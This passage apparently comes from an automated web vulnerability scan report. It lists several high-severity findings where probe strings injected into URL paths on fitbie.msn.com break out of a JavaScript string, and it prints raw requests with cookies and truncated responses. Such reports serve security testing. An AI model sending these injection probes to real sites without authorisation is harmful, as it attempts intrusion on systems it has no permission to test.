Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:03 +0000
ETag: "1297607403-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:04 GMT
Date: Sun, 13 Feb 2011 14:30:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulta767d';87fcf881513?destination=node%2Fdefaulta767d';87fcf881513&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.107. http://fitbie.msn.com/sites/default/files/stk156319rke-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/stk156319rke-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3afc'%3b46d7e1e4aa7 was submitted in the REST URL parameter 2. This input was echoed as a3afc';46d7e1e4aa7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaulta3afc'%3b46d7e1e4aa7/files/stk156319rke-th_0.jpg?1290563032 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulta3afc';46d7e1e4aa7?destination=node%2Fdefaulta3afc';46d7e1e4aa7&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.108. http://fitbie.msn.com/sites/default/files/subway-commute-safety-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/subway-commute-safety-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f62c'%3b2c774a12d7f was submitted in the REST URL parameter 2. This input was echoed as 8f62c';2c774a12d7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default8f62c'%3b2c774a12d7f/files/subway-commute-safety-th_0.jpg?1297468386 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:09 +0000
ETag: "1297607169-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:09 GMT
Date: Sun, 13 Feb 2011 14:26:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default8f62c';2c774a12d7f?destination=node%2Fdefault8f62c';2c774a12d7f&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.109. http://fitbie.msn.com/sites/default/files/success-after-combo-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/success-after-combo-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dd6f'%3bec90b3e4ce9 was submitted in the REST URL parameter 2. This input was echoed as 7dd6f';ec90b3e4ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default7dd6f'%3bec90b3e4ce9/files/success-after-combo-th.jpg?1294844837 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:49 +0000
ETag: "1297607389-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:49 GMT
Date: Sun, 13 Feb 2011 14:29:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default7dd6f';ec90b3e4ce9?destination=node%2Fdefault7dd6f';ec90b3e4ce9&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.110. http://fitbie.msn.com/sites/default/files/thrust_B-female-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/thrust_B-female-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab0d2'%3b40aed4c0f49 was submitted in the REST URL parameter 2. This input was echoed as ab0d2';40aed4c0f49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultab0d2'%3b40aed4c0f49/files/thrust_B-female-th_1.jpg?1294861910 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:53 +0000
ETag: "1297607393-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:54 GMT
Date: Sun, 13 Feb 2011 14:29:54 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultab0d2';40aed4c0f49?destination=node%2Fdefaultab0d2';40aed4c0f49&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.111. http://fitbie.msn.com/sites/default/files/walk_off_weight_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/walk_off_weight_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4e39'%3b6f6f8646d33 was submitted in the REST URL parameter 2. This input was echoed as f4e39';6f6f8646d33 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultf4e39'%3b6f6f8646d33/files/walk_off_weight_th.jpg?1286494459 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:44 +0000
ETag: "1297607204-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:45 GMT
Date: Sun, 13 Feb 2011 14:26:45 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf4e39';6f6f8646d33?destination=node%2Fdefaultf4e39';6f6f8646d33&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.112. http://fitbie.msn.com/sites/default/files/wh_personal_trainer_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/wh_personal_trainer_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 213fc'%3b9f9a992db5e was submitted in the REST URL parameter 2. This input was echoed as 213fc';9f9a992db5e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default213fc'%3b9f9a992db5e/files/wh_personal_trainer_th.jpg?1286309296 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:04 +0000
ETag: "1297607404-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:05 GMT
Date: Sun, 13 Feb 2011 14:30:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default213fc';9f9a992db5e?destination=node%2Fdefault213fc';9f9a992db5e&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.113. http://fitbie.msn.com/sites/default/files/win-the-war-on-fat-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/win-the-war-on-fat-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14ef8'%3be86b01acd7a was submitted in the REST URL parameter 2. This input was echoed as 14ef8';e86b01acd7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default14ef8'%3be86b01acd7a/files/win-the-war-on-fat-th.jpg?1287692880 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
